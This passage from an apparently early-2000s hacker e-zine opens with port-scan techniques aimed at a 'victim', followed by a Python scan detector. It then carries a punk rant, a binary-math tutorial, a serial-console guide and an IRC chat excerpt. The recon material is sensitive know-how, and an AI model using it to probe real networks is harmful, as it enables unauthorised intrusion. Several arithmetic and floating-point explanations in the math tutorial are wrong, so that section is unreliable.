will bypass the acd's filtering and allow you to see beyond the acd.

-----------------------------------------------------------------------

:: port scanning ::

once  you  have  a list of operational systems on your target's network
you  can  begin  looking  for  vulnerable  services  on each individual
system.  this  can  be accomplished by connecting to every tcp/udp port
on  the  victim's  machine  to determine which ports are set in listening
state.

if  a  port is listening, there's a good chance that there is a service 
daemon  running on that machine handling connections to that port.  and 
if there's a daemon running, there's a chance that it's vulnerable.

for  instance, http daemons, or webservers, generally run on port 80. if
port  80  is  listening,  it's  quite likely that the target machine is
running a webserver.

-tcp full connection scan:
 -------------------------
 the  most  common  type  of port scan is the tcp full connection scan.
 this type of scan completes a three-way handshake, syn, syn/ack, ack.
 this  method is easily detectable, but with this method it is possible
 to grab the daemon's banner, which often includes the name and version
 of the running service.

-tcp syn scan:
 -------------
 the  tcp  syn scan is a little more stealthy because a full connection
 is  never made. the downside is that with a syn scan banners cannot be
 retrieved.  however, an attacker can make an educated guess as to what
 service  is  running  on the port because all services have a default. 
 (httpd:80, ftpd:21, telnetd:23, smtpd:25, etc)

-tcp ack scan:
 -------------
 this method can help in determining what types of packets are filtered
 by  an acd. the tcp ack bit is set before the packet is sent to see if 
 the acd filters packets without this bit set. 

-tcp fin scan:
 -------------
 fin  packets  are  sent  to the target system on every port, one after
 another. all closed ports should reply with rst's according to the
 standards of the tcp protocol.

-tcp xmas scan:
 --------------
 an advanced version of the fin scan, the xmas method sends fin, urg
 and push packets, also forcing rst's from all closed ports.

-tcp null scan:
 --------------
 a  tcp null scan sends packets to the target machine with no bits set.
 this forces all closed ports to respond with an rst.
  
-udp scan:
 ---------
 the  basic  principle  of  a  udp  scan  is  that  when  no  icmp port
 unreachable msg is received, the port must be listening.
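
an added example (not part of dropcode's original article): the flag patterns listed above are also what a defender matches on, so the python below labels each tcp flow by the scan type its client-side flags fit and reports any source that probes several targets, along with icmp echo sweeps. the packet records, the source addresses and the threshold of three targets are constructed for illustration.

```python
from collections import defaultdict

# tcp flag bits as laid out in the tcp header
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
ICMP_ECHO = 8  # echo request (icmp type 0x08)


def label_flow(client_flags):
    """name the probe that a flow's client-side flag sequence matches, or None."""
    first = client_flags[0]
    if first == SYN:
        # client answers the syn/ack with an ack: full connection.
        # anything else (rst, silence): half-open syn probe.
        if len(client_flags) > 1 and client_flags[1] == ACK:
            return "connect"
        return "syn"
    if first == 0:
        return "null"
    if first == FIN | PSH | URG:
        return "xmas"
    if first == FIN:
        return "fin"
    if first == ACK:
        return "ack"  # an ack that no syn preceded
    return None


def detect(packets, min_targets=3):
    """return {(source, kind): sorted targets} for sources that touched at least
    min_targets distinct hosts (ping sweep) or host/port pairs (tcp scans)."""
    flows = defaultdict(list)   # (src, dst, dport) -> client flags in arrival order
    seen = defaultdict(set)     # (src, kind) -> distinct targets
    for src, dst, proto, dport, value in packets:
        if proto == "icmp" and value == ICMP_ECHO:
            seen[(src, "ping-sweep")].add(dst)
        elif proto == "tcp":
            flows[(src, dst, dport)].append(value)
    for (src, dst, dport), flags in flows.items():
        kind = label_flow(flags)
        if kind:
            seen[(src, kind + "-scan")].add((dst, dport))
    return {key: sorted(targets) for key, targets in seen.items()
            if len(targets) >= min_targets}


# constructed sample: (source, destination, protocol, dest port, tcp flags or icmp type)
SAMPLE = (
    # one source pings four hosts in the article's example netblock
    [("192.0.2.7", f"10.10.10.{h}", "icmp", None, ICMP_ECHO) for h in range(1, 5)]
    # same source sends syn then rst to four ports: half-open probes
    + [("192.0.2.7", "10.10.10.1", "tcp", p, f)
       for p in (21, 23, 25, 80) for f in (SYN, RST)]
    # fin+psh+urg to three ports
    + [("192.0.2.9", "10.10.10.2", "tcp", p, FIN | PSH | URG) for p in (21, 22, 23)]
    # only two flagless packets: below the threshold
    + [("192.0.2.9", "10.10.10.2", "tcp", p, 0) for p in (80, 443)]
    # an ordinary web client completing one handshake
    + [("198.51.100.5", "10.10.10.1", "tcp", 80, f) for f in (SYN, ACK, PSH | ACK)]
)

if __name__ == "__main__":
    for (src, kind), targets in sorted(detect(SAMPLE).items()):
        print(f"{src:15} {kind:12} {len(targets)} targets")
```

the ordinary client is labelled as a full connection but never reported, because it touches one port; the threshold, not the flag pattern, is what separates a scan from normal traffic.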

-----------------------------------------------------------------------

:: outro ::

well, that's about it for network recon. any questions or comments can
be emailed to me at uberego@hotmail.com ... 

respect to:  gr3p,  rambo,  adeamis, smurf, fork, smiley, antimatt3r, 
             gambiit, ocean, ech0. droptone:  dood,  it looks so much 
             better on me :P, abused: xoxoxxx, heather:  can't we all 
	     jus' get along? kleptic: don't give up on outbreak, dood
             people need you. :) honeypot: i lub j0o.
             ... anyone I'm forgetting, meh. :)

EOF.

-----------------------------------------------------------------------

                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 6 of 12

Hey Ho! Let's Go! (a rant about try-hard punk kids)
---------------------------------------------------
By: fwaggle



I have a beef with many of what i would call "try-hard" punks out there. 
since punk seems to be becoming cool among junior high kids and the like - 
quite possibly due to the growing popularity of skateboarding and other 
extreme sports on tv - i've noticed an alarming trend.

there's a lot of people out there, who when asked if they like a particular 
song, particularly those on the radio and the like, will say "no, it's not 
punk" or "no, it's on the radio".. i didn't ask if it was punk, or on the 
radio, i asked if you liked it you fucking neanderthal.. i was inquiring 
as to whether or not you found it catchy... if it were played at a show you 
were at, would you dive into the mosh pit to it?

don't get me wrong, i hate the radio and mtv as much as the next punk.. 
they repeat songs to death, and they ignore many of the cooler bands out 
there. but there comes a point when that attitude just becomes silly.. 
while i do hate mtv (i think the only decent show on there was daria heh), 
i do find a couple of mainstream songs catchy.. for example, i do like a 
bit of blink 182 every now and then.

then you get these "wannabe hardcore" punks who talk shit about not being 
"hardcore" because you happen to listen to __________ by _________ and they 
were on MTV last night... they talk about being brainwashed by mass 
marketing, but i ask you this.. who's brainwashed? music is about what 
sounds good, not what fits into your own little idea of what you and all 
your friends should like..

the very idea of punk to me is that i don't want to be labeled and 
segregated into some group classification, i am me. you are you. if we 
happen to like the same band and the same songs by that band and said band 
tours into our town then we'll go and have a riot. if not, we both deal 
with it.

i think it's ironic that these try-hards are so preoccupied trying to be 
part of this cool group who doesn't care what people think, that they 
actually start to worry about whether or not people think they're part of 
that group (if that makes any sense to you).

for fuck's sake, i went and saw that britney spears movie on opening night 
(my wife wanted to see it)... my sexuality is still fully intact, and as a 
bonus you get to see britney in her underwear on two separate occasions, 
one of which is within 30 seconds of the opening credits... but my point 
is that i still consider myself punk at heart.. if you don't think that's 
hardcore, well fuck you... who's punker than who? does it really matter?

just keep it real.. practice what you preach.. if you want to talk about 
not caring what others think, then fucking DO IT..

fwaggle

catch me on irc.mooircd.org / #moo

                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 7 of 12

Number Systems and Binary Math

Written by Meggito on September 1, 2001
Last updated on October 20, 2001


First off, giving credit where credit's due.  I'd like to thank Sally
Ballacqua, Mary Johnson, Hanet Mully, and Charles Brewer whose packet
gave me a much better way to look at numbering systems and encouraged a
rewrite of this file.  This file starts off with what binary and
hexadecimal are and how to convert to other number systems.  Afterward I
use binary math to show how to do math in ANY number system.  I use
binary for most math but the multiplication, division, and modulus are
done the same way in other numbering systems.  I cover how to and not to
do addition, subtraction, multiplication, division, and modulation.
Also, how to use floating point decimals and multiplication and division
with them.  I tried to make it as simple as I could so it is easily
understandable.


Decimal

The most common number system, the decimal system is based on a system
of ten.  Each column can represent ten symbols and each additional
column represents multiples of ten of the column to its right.  Meaning
that 9 is nine and 90 is nine multiples of ten.  95 is then nine
multiples of ten followed by 5 multiples of 1. The multiples each column
will represent will depend on the system.  In the decimal system it
goes:

     0         5,        4         6         3.        4
     ^         ^         ^         ^         ^         ^
  10,000     1,000      100       10         1         .1

This number would be 5,463.4 when combined, five-thousand, four-hundred,
sixty-three.  A good way to look at this is combining each column.  The
'and' is used to represent the decimal point.  The number farthest right
without passing a decimal point (.) is always the ones place.  If there
is no decimal point then the ones place is considered to be the farthest
right.  Each whole number group of 3 is separated by a comma.
If there are 0s on either end they may be eliminated except in certain
situations (used to represent a certainty) that unless you're a
scientist aren't important.  Many of these rules will follow into other
numbering systems.


Binary

Binary is also similar to Decimal.  The largest difference is that it is
based on either true or false, on or off, or 1 or 0.  Each column can
only represent one of two numbers.  This means that each column has a
value of 1 or 0.

   1      0      1      1      1      0      1      1      0      1
   ^      ^      ^      ^      ^      ^      ^      ^      ^      ^
  256    128     64     32     16     8      4      2      1      .5

The above number 101110110.1 would be equivalent to 374.5 (decimal
points or binary points or whatever are rare in binary but do exist).
This is much different from what most people are used to, but if you
wanted to convert it into your familiar decimal system you could
multiply each number by its decimal equivalent.  Either you add the
number or you don't, 1 or 0.  You can just take the truths and add them.
So 256 + 64 + 32 + 16 + 4 + 2 + .5 = 374.5.  This causes numbers to
be much longer than in other number systems.  This is the system used to
program computers because of the fact that they are either true or false.
Programming languages are just representations of these 1s and 0s.  Each
of these columns is known as a bit.  They are usually grouped into
groups of eight, known as bytes.  One byte can represent up to
two-hundred fifty-six possibilities.  Usually when you have a number
that uses less than a whole byte, such as 1011 (thirteen) you'd add
valueless 0s to the end to complete the byte, 00001011.  This enables
computers to know when one byte ends and another begins.  So
0110110101100101 is the same thing as 01101101 and 01100101 because a
computer will separate them into groups of eight.  This allows an
endless stream of 1s and 0s without any need for spacing, which a
computer cannot recognize, except as another set of 1s and 0s that
aren't separated.

Another odd piece of binary is negatives.  There is usually no negative
sign, and never with programming.  There are signed and unsigned binary
numbers.  If it is signed then the first number represents positive and
negative.  0 is positive and 1 is negative.  This also means that an
unsigned 8 bit binary byte can have a value of from 0 to 255 while a
signed binary byte can have a value from -128 to 127.  Both do have 256
possible values though.  I'll cover negatives under adding and adding
negatives.


Hexadecimal System

This system is similar to the decimal system.  The difference is that
each column represents sixteen rather than ten.  Appropriately each
column will also refer to sixteen multiples of the column to its right.
Since the arabic writing system only has ten number characters the
numbers eleven through sixteen are represented by the letters A through
F.  Meaning that thirteen would be D and fifteen F.  Remember, A is 10,
not 11.  I still make that mistake occasionally.

     5         A         3         8         B         5
     ^         ^         ^         ^         ^         ^
   65536      4096      256        16        1       .0625

This would then be 5a38b.5.  Meaning 5 x 65536, 11 x 4096, 3 x 256, etc.
You can follow a similar approach to convert this as you did with
binary.  You would then find that this number is equivalent to
369,547.0625 in the decimal system.  Hexadecimal, or hex, is often used
in programming.  Since group is equivalent to 1000 in binary,
hexadecimal is very useful to computer programming.  One example of this
is the very common use of hex code to represent colors.  They use two
columns to represent each of the three colors used in computers, red,
green and blue.  They are usually set up in the format RRGGBB where each
letter represents the color respectively.  Using the hex code any value
between 0 and 256 (one byte) can be used to represent the amount of each
color present.  So you might find 5E425A used to represent a color.
This would mean that there was 94 red, 66 green, and 90 blue out of a
possible 256 each (a fairly grayish purple).  This ability to converge
on the same numbers as binary makes it very useful on computers.


Other Ways to Convert

One other method to look at converting numbers is multiplying each digit
by the base raised to the power of the digit's location relative to the
one's place.  If you don't already know any number to the 1st power is
itself and to the 0 power it is always 1.  Note that all powers and
roots are based on base 10.

Base 10
342 = 3*(10^2) + 4*(10^1) + 2*(10^0)
    = 3*100 + 4*10 + 2*1
    = 300+40+2
    = 342

Base 7
4526 = 4*(7^3) + 5*(7^2) + 2*(7^1) + 6*(7^0)
     = 4*343 + 5*49 + 2*7 + 6*1
     = 1372+245+14+6
     = 1637

To reverse this you divide by the base you want to change to and keep
track of the remainders.  Keep dividing until you get 0.  The examples
start from the bottom and work up!  Read the answer top down.  You can
do it the other way if you like but it's a lot easier if you find yourself
having to do it on paper just to write the answer above as you divide.

224 Base 10 to Base 2
    1/2 = 0      R 1
    3/2 = 1      R 1
    7/2 = 3      R 1
   14/2 = 7      R 0
   28/2 = 14     R 0
   56/2 = 28     R 0
  112/2 = 56     R 0
  224/2 = 112    R 0   =11100000

519 Base 10 to Base 13
    3/13 = 0     R3
   39/13 = 3     R0
  519/13 = 39    RC    =30C


Binary to Hexadecimal and Back

The fact that binary is base 2 and hexadecimal is base 2 to the 4th
makes conversion simple.  You just take each group of four binary digits
and convert them one group at a time.  The reverse is also true, look at
the examples.

011001011110 can be split into groups of four...
0110-0101-1110 then you find the hexadecimal value for each group so...
   6    5    E    or 65E
so 011001011110 = 65E

A3F can be reversed by splitting each into its binary value so
   A    3    F    =
1010-0011-1111

This method can be used whenever the base of one system is divisible by
another.  It is based on logarithms that I'm not going into but it's
fairly simple math.  If you had a base 3 and a base 9 then a base
9 digit would be 2 base 3 digits and 2 base 3 digits could convert to
base 9.


Binary Addition and Adding Negative Numbers

Adding and subtracting unsigned binary numbers is fairly simple.  You
must remember to carry numbers over.  Also when programming with a
limited number of bits any numbers carried over will be lost.  These
examples are all 8 bit.

  121      01111001
+ 183      10110111
  304     100110000 but the leading 1 is lost so 00110000 or 48

In this example two unsigned 8-bit numbers were added.  Their total
was 304, but any numbers carried past the number of bits allowed
are lost.  This means that after 255 the next number is 0.  Subtracting
is similar, but instead of subtracting you add the negative.  To
find the negative you take what is called the two's complement.  First
you find the complement of each bit (if you don't understand
complements, change a 0 to a 1 and a 1 to a 0) to find the one's
complement.  Next you add 1 to that number to find the two's complement.
This is the negative of the original number (also how you find
negatives) and you just add that instead of subtracting.

  58      42 = 00101010  so...                    58    00111010
 -42      one's complement = 11010101         +(-42)    11010110
  16      two's complement = 11010110             16    00010000

If the answer is negative or you just want to change a negative number
to positive reverse this.  First you subtract 1 (add 11111111), then
find the complement of each bit again.

  11010110      11010101
+ 11111111      00101010 so...
  11010101      42

It is important to remember that if the number is unsigned there
isn't a negative.
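
The conversions and 8-bit arithmetic worked by hand above (the remainder method from Other Ways to Convert and the two's complement addition in this section), written out as a small Python example that is added here and is not part of Meggito's original file. The function names are made up for the illustration; it goes a little further than the text by handling any base from 2 to 36 and by reading digits after the point.

```python
DIGITS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
BITS = 8
MASK = (1 << BITS) - 1   # 11111111, the largest unsigned 8-bit value


def digit_value(ch, base):
    """Value of one digit character, rejecting digits the base does not have."""
    d = DIGITS.find(ch)
    if d < 0 or d >= base:
        raise ValueError(f"{ch!r} is not a base {base} digit")
    return d


def to_base(n, base):
    """Repeated division: keep the remainders, then read them last to first."""
    if not 2 <= base <= len(DIGITS):
        raise ValueError("base must be between 2 and 36")
    if n < 0:
        raise ValueError("only non-negative whole numbers are converted")
    if n == 0:
        return "0"
    remainders = []
    while n > 0:
        n, r = divmod(n, base)
        remainders.append(DIGITS[r])
    return "".join(reversed(remainders))


def from_base(text, base):
    """Each digit times the base raised to its position relative to the ones place."""
    whole, _, frac = text.upper().partition(".")
    value = 0
    for ch in whole:
        value = value * base + digit_value(ch, base)
    for place, ch in enumerate(frac, start=1):
        value += digit_value(ch, base) * base ** -place
    return value


def add8(a, b):
    """Unsigned 8-bit addition: anything carried past bit 8 is lost."""
    return (a + b) & MASK


def negate8(n):
    """Two's complement: flip every bit (one's complement), then add 1."""
    return ((n ^ MASK) + 1) & MASK


def as_signed(byte):
    """Read an 8-bit pattern as signed: a leading 1 means negative."""
    return byte - (1 << BITS) if byte & (1 << (BITS - 1)) else byte


if __name__ == "__main__":
    print(to_base(224, 2), to_base(519, 13))          # the two division tables
    print(from_base("4526", 7), from_base("101110110.1", 2))
    print(add8(121, 183))                             # 304 wraps around
    print(format(negate8(42), "08b"), add8(58, negate8(42)))
    print(as_signed(negate8(42)))
```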


Multiplication and Long Division
Multiplication is fairly simple.  If you had 3*7 you'd just do 7+7+7.
This is how a computer does multiplication.

                   1221 (carry over)   Simpler
  3 00000011  so   00000111            00000111      /-> 00001110

 21 00010101       00000111            00001110  --/     00010101 = 21
                   00010101 = 21

The only problem here is that this doesn't work real well for larger
numbers.  No, we'll have to use long multiplication (well, they call it
long division) because we aren't computers who can perform millions of
additions a second.

 13 00001101          1101

 65 01000001          1101
                       00
                  +110100
                  1000001 = 65

Dividing is slightly different.  Instead of adding you could multiply by
the reciprocal.  This means instead of multiplying by 7 you multiply by
1/7.  Also, remember that any number /1 equals itself.

 14 00001110     00001110 * 00000001 = 00001110 = 14
  7 00000111     00000001 * 00000111 = 00000111 =  7
  2 00000010

So, if you have any smarts about you you'll notice that the answer is 14
over 7 which takes us back to where we started.  Kinda useless isn't it.
Just a good thing to know doesn't work.  This is where long division
comes in...

 14 00001110         0010 or 0010 = 2
  7 00000111     111/1110
  2 00000010

This is kinda simple because I used easy numbers.  When you get to
0000111, 000001111 will go into it once (you can ignore the leading 0s).
It gets much more complicated but it can be done.  Since these are
simple numbers it is unnecessary to turn them into negatives but you may
have to in many cases.

 15     00001111              0001.111 = 1+.5+.25+.125
  8     00001000         1000/1111       1.875
  1.875 00000001.111         -1000
                              01110
                              -1000
                               01100
                               -1000
                                01000
                                -1000
                                 0000

Problem is that unless you're using a data type that recognizes decimals
(int doesn't unless you deliberately put them in) the decimals
will be lost.  If these were both ints the answer would be 1.  This is
when modulus comes in.  Most people have not run into modulus before
programming.  Modulus is basically the remainder after being
divided.  The symbol for modulus is %.  For example, 15%8 would be the
remainder when dividing by 8, so the answer is 7.  When doing this in
binary just stop when you run out of numbers, no decimal point (or
whatever), and take whatever's left.  You may need to change these
numbers to negatives if you do not understand the subtraction.

  17 00010001         00000101 = 7 (division)
 % 3 00000011      11/00010001
   2 00000010           -11
                         0100
                          -11
                          010 = 2 (modulus)

Modulus comes at the same time as multiplication and division in the
order of operations.  You read it from left to right and do whichever
comes first of the 3.

In both multiplication and division of 2s or multiples of 2s all you
have to do is shift numbers.  Multiplication shifts left and division
shifts right.  For example, 0110*2=1100 and 0110/2=0011.  Also,
00110000*4=11000000 and 00110000/8=00000110.  You shift it by the
exponent 2 is to.  Since 8 is 2^3 you move it 3 digits.  The same is
true of modulus, all you have to do is shift it right as you would in
division and then take the value after the decimal.  So 0101%2=010.1
or 1.  0111%8=.111 or 7.


Floating

A while ago the IEEE (Institute of Electrical Engineers) came up with a
standard 32 bit representation for floating points.  There are 3 parts
to this, the sign is 1 bit, the exponent is 8, and the mantissa is 23.

01101100111010000000000000000000
||______||_____________________|
|    |              |
|    Exponent       Mantissa
Sign

The sign decides whether a number is positive or negative in the same
way as a signed bit.  The exponent is the power that the mantissa is to.
The mantissa is the value to the exponent.  To find a number's mantissa
and exponent divide it by 2 until it is between 0 and 1.  The mantissa
is the remainder, ignoring the decimal point.  The exponent is the number
of times you had to divide added to 127.  An easy way to find the
exponent without converting to decimal is to just add a 1 in the first
digit and subtract 1 from the number.  So 7 is 10000110.

13/2 = 6.5/2 = 3.25/2 = 1.625/2 = 0.8125
So the mantissa is 0.8125 and the exponent is 131 (4+127)
Which in binary the mantissa is 0.1101 (notice that 1101 is 13) and the
exponent is 10000011
This would be rewritten as 0-10000011-11010000000000000000000
So 13 = 00001101 = 010000011110100000000000000000000000

This can also be done starting with a binary number.  There is a big
advantage in that since you are dividing by 2 you can just shift it left
until there is no 1 (value) after the decimal and the number of times
you've shifted is the exponent.  When using negatives carry the 1 over
to the mantissa and do not worry about finding the two's complement.

00000110
So the exponent is 10000010 because you've shifted 3
The mantissa is 110 (the number after the first 1) + twenty 0s to make
it 23 digits
This means your final number is 01000001011000000000000000000000
So 00000110 = 01000001011000000000000000000000

Multiplication and Division, Floating Point Style

All you have to do with mantissas to multiply or divide is add or =
subtract the sign and exponents and multiply or divid the mantissas =
respectively.  Obviously adding is multiplication and subtracting is =
division.  Do not use the first digit in the exponent when adding, it =
will always be a 1.  When using negative's it is not necessary and =
usually easier not to find the two's compliment.

Multiplication
11 =3D 00001011 =3D 0 10000011 10110000000000000000000
  5 =3D 00000101 =3D 0 10000010 10100000000000000000000
55 =3D 00110111 =3D 0 10000101 11011100000000000000000 =
(1011*101=3D110111)

Division
30 = 00011110 = 0 10000100 11110000000000000000000
 -6 = 00000110 = 1 10000010 11000000000000000000000
 -5 = 00000101 = 1 10000010 10100000000000000000000 (1111/11=101)

I believe I am mistaken slightly on this.  I think there is something
you're supposed to do with the leading 1 in the exponent but I do not
know what.  Also you may have to convert into two's complement for
negative numbers.  I'd be surprised if the two weren't related.  Either
way just carrying the negative to the sign works fine.
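An added example (not the author's code) of how the IEEE 754 single-precision format treats the leading 1 and the sign: the number is normalised to 1.xxx, the leading 1 is left out of the 23 stored bits, and a negative only sets the sign bit. The stored patterns therefore differ from the hand-worked ones above (13 gets exponent 10000010); all function names are this example's own.

```python
import struct

BIAS = 127       # exponent bias of IEEE 754 single precision
FRAC_BITS = 23   # stored fraction bits; the leading 1 is implicit


def fields(x):
    """Return (sign, exponent, fraction) exactly as float32 stores x."""
    (bits,) = struct.unpack(">I", struct.pack(">f", x))
    return bits >> 31, (bits >> FRAC_BITS) & 0xFF, bits & ((1 << FRAC_BITS) - 1)


def encode_int(n):
    """Hand-encode a nonzero integer with |n| < 2**24 (exactly representable)."""
    if n == 0 or abs(n) >= 1 << (FRAC_BITS + 1):
        raise ValueError("outside the range this sketch handles")
    sign = 1 if n < 0 else 0                     # sign-magnitude, no two's complement
    mag = abs(n)
    e = mag.bit_length() - 1                     # shifts needed to reach 1.xxx
    frac = (mag ^ (1 << e)) << (FRAC_BITS - e)   # drop the leading 1, left-align
    return sign, e + BIAS, frac


def multiply(a, b):
    """Multiply two (sign, exponent, fraction) triples, truncating extra bits."""
    (sa, ea, fa), (sb, eb, fb) = a, b
    ma = (1 << FRAC_BITS) | fa                   # restore the implicit leading 1
    mb = (1 << FRAC_BITS) | fb
    prod = ma * mb                               # 47 or 48 bits wide
    exp = ea + eb - BIAS                         # add exponents, remove one bias
    if prod >> (2 * FRAC_BITS + 1):              # product reached 2.0: renormalise
        prod >>= 1
        exp += 1
    frac = (prod >> FRAC_BITS) & ((1 << FRAC_BITS) - 1)
    return sa ^ sb, exp, frac                    # signs combine with XOR


def to_bits(triple):
    """Format a triple as 'sign exponent fraction' in binary."""
    sign, exp, frac = triple
    return f"{sign:01b} {exp:08b} {frac:023b}"


if __name__ == "__main__":
    for n in (13, 6, 11, 5):
        print(n, to_bits(encode_int(n)))
    print("11*5 ", to_bits(multiply(encode_int(11), encode_int(5))))
    print("-6*5 ", to_bits(multiply(encode_int(-6), encode_int(5))))
```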


ASCII and Symbols

ASCII, or American Standard Code for Information Interchange, was
proposed by ANSI as a way to represent symbols (letters, numbers, etc.)
with a byte.  They developed a set of one hundred twenty-eight basic
symbols that most computers represent.  Each corresponds to a certain
number, as listed in a second.  This set of 128 symbols is fairly
standard though it varies some.  Other symbols are available in the
other possible 128 symbols, the extended set.  One problem is that there
are a variety of extended sets, many using different symbols and
arrangements.  There are also other standards such as Unicode (16 bit
multi-writing-system, i.e. Traditional Chinese) and EBCDIC (Extended
Binary Coded Decimal Interchange Code) that are much less common.  For
those of you who don't know this, hold alt and hit one of these key
combinations.  Pretty useless except for the extended set but good to
know.

I'm leaving out the first 32 symbols and 127 because they are to be
recognized by your computer.  I can't think of any reason other than
programming to ever know them, and if you're programming then you have
them or can get them.

000 -    - 00000000   064 - @   - 01000000
001 -    - 00000001   065 - A   - 01000001
002 -    - 00000010   066 - B   - 01000010
003 -    - 00000011   067 - C   - 01000011
004 -    - 00000100   068 - D   - 01000100
005 -    - 00000101   069 - E   - 01000101
006 -    - 00000110   070 - F   - 01000110
007 -    - 00000111   071 - G   - 01000111
008 -    - 00001000   072 - H   - 01001000
009 -   - 00001001   073 - I   - 01001001
010 -    - 00001010   074 - J   - 01001010
011 -    - 00001011   075 - K   - 01001011
012 -    - 00001100   076 - L   - 01001100
013 -    - 00001101   077 - M   - 01001101
014 -    - 00001110   078 - N   - 01001110
015 -    - 00001111   079 - O   - 01001111
016 -    - 00010000   080 - P   - 01010000
017 -    - 00010001   081 - Q   - 01010001
018 -    - 00010010   082 - R   - 01010010
019 -    - 00010011   083 - S   - 01010011
020 -    - 00010100   084 - T   - 01010100
021 -    - 00010101   085 - U   - 01010101
022 -    - 00010110   086 - V   - 01010110
023 -    - 00010111   087 - W   - 01010111
024 -    - 00011000   088 - X   - 01011000
025 -    - 00011001   089 - Y   - 01011001
026 -    - 00011010   090 - Z   - 01011010
027 -    - 00011011   091 - [   - 01011011
028 -    - 00011100   092 - \   - 01011100
029 -    - 00011101   093 - ]   - 01011101
030 -    - 00011110   094 - ^   - 01011110
031 -    - 00011111   095 - _   - 01011111

032 - (space)  - 00100000   096 - `   - 01100000
033 - !   - 00100001   097 - a   - 01100001
034 - "   - 00100010   098 - b   - 01100010
035 - #   - 00100011   099 - c   - 01100011
036 - $   - 00100100   100 - d   - 01100100
037 - %   - 00100101   101 - e   - 01100101
038 - &   - 00100110   102 - f   - 01100110
039 - '   - 00100111   103 - g   - 01100111
040 - (   - 00101000   104 - h   - 01101000
041 - )   - 00101001   105 - i   - 01101001
042 - *   - 00101010   106 - j   - 01101010
043 - +   - 00101011   107 - k   - 01101011
044 - ,   - 00101100   108 - l   - 01101100
045 - -   - 00101101   109 - m   - 01101101
046 - .   - 00101110   110 - n   - 01101110
047 - /   - 00101111   111 - o   - 01101111
048 - 0   - 00110000   112 - p   - 01110000
049 - 1   - 00110001   113 - q   - 01110001
050 - 2   - 00110010   114 - r   - 01110010
051 - 3   - 00110011   115 - s   - 01110011
052 - 4   - 00110100   116 - t   - 01110100
053 - 5   - 00110101   117 - u   - 01110101
054 - 6   - 00110110   118 - v   - 01110110
055 - 7   - 00110111   119 - w   - 01110111
056 - 8   - 00111000   120 - x   - 01111000
057 - 9   - 00111001   121 - y   - 01111001
058 - :   - 00111010   122 - z   - 01111010
059 - ;   - 00111011   123 - {   - 01111011
060 - <   - 00111100   124 - |   - 01111100
061 - =   - 00111101   125 - }   - 01111101
062 - >   - 00111110   126 - ~   - 01111110
063 - ?   - 00111111   127 -    - 01111111
                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 8 of 12


----nix console---

Ok boys, since I feel this is so leet I will share it with you.
It's pretty sweet to use a small old 286/386/486 as a serial console for a
linux box. The feel and look is pretty sweet. Most people shy away from
terminals since there are really no graphics. I use my consoles for a lot of
different things; my ultimate use is for stuff like pinging, dns resolving
and nmap. To get things started you must first have or purchase a null
modem cable. This can be 9 pin or 25 pin. It's real cool to make your own
cables, but most people find it less time consuming to just outright buy a
cable. The price of a cheap null modem cable is no more than 15 dollars.
Getting a terminal is very simple, only 4 steps are needed; the hardest
part is making sure that you have a proper null-modem cable for your needs.


First--we need to make sure that getty is installed on your box.
At the root prompt issue the command:
whereis getty

If you cannot find it you need to install it. On Redhat 6.0 and up, even on
7.2, it is located on the 2nd CD at /RedHat/RPMS/getty_ps-2.0.7j-12.i386.rpm.
For you non-redhat users it is just as simple to install the getty
package for your distro.



Second--on your linux box we need to add a line in /etc/inittab.


S1:23456:respawn:/sbin/getty ttyS1 9600 vt100

What all this means:

S1:---------------is the line's id, a reminder of what the entry is for.
23456:------------are the run levels.
respawn:----------is automatic restart on disconnect.
/sbin/getty:------is the command to run.
ttyS1-------------is the serial port, COM2 in Windows terms (use ttyS0
                  for COM1).
9600--------------is the baud rate ---I use 19200 for 486's.
vt100-------------is the terminal type (you can use one that suits your
                  needs; vt320 works great).

Third--you need to restart your linux box or issue the >init q<
command, which makes init re-read your /etc/inittab file.

Fourth--If everything worked out right, all you need on the box you're using
as a terminal is a terminal emulator, on a windows box something like
(procomm) or (kermit). I like procomm; it is real close to linux's (minicom).
minicom is actually a hack look and feel copy of procomm.

You don't really need a DOS box for the terminal. You can use a floppy linux
distro, also. There are many flavors of floppy distros that will work for
this. If you want to make it simple for yourself, use an msdos boot disk and
put either the kermit or procomm application to start up in the
autoexec.bat. Just make sure that in procomm and kermit you set it to use
the right comm port that you specified in your /etc/inittab file. It is
important to make sure you plugged it into the right com port also.

Take note: if you can get your hands on an old terminal, this is real cool. I
think an old terminal looks a lot leeter than an old 386/486. If you have a
terminal you can forget the msdos box or linux distro box with the
emulator.

To sum things up, you can have a cool terminal for your linux server.
Having a terminal as a console keeps your server simple. This also spares
you from wasting a nice monitor that is just going to sit there and do
nothing. If you happen to want to run X from your old 286/386/486 this can
be done without a null modem cable; you need a nic card instead.  An X
terminal has many more steps involved. I will not get into X consoles
since there are many howto's on the net. X console is almost as easy to set
up as a terminal console. A little know-how and skills are needed also.

      Enjoy `,)

      `amatier

---------------------------------------------------------------------
I Have Seen The Future, And Have Seen The Past, And Yes Our Master Is
There.<<<`das`amatier>>> Free Your Mind. The Future Is Near...
---------------------------------------------------------------------
                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 9 of 12


join (#hacking) hackerinc (hackerinc@AC967D3E.ipt.aol.com)
<hackerinc> hello]
<@BadGadget> hax0rinc
<@BadGadget> word
<@BadGadget> so you're like a an incorporated hacker?
<hackerinc> ok
<hackerinc> just a name
<hackerinc> u
<@BadGadget> what's your real name?
<hackerinc> hacker27
<@BadGadget> wow.  your mom must have been smoking the shit dude
<@BadGadget> that name sucks
<hackerinc> anyway
<hackerinc> what going on in here
<@BadGadget> so hacker27. if I can call you by your birth name
[ka] join (#hacking) c-k-y (~c-k-y@65.92.99.135)
<hackerinc> not
<@BadGadget> where do you live hacker27?
<hackerinc> ca
<hackerinc> u
<@BadGadget> detroit. wiggidy wiggidy
<hackerinc> ok
<@BadGadget> so hacker27. is there any meaning behind that name?  like any origin.  was your dad named hacker27?
<hackerinc> just a nanme
<@BadGadget> a nanme?
<@BadGadget> never heard of that
<@BadGadget> is that in germany?
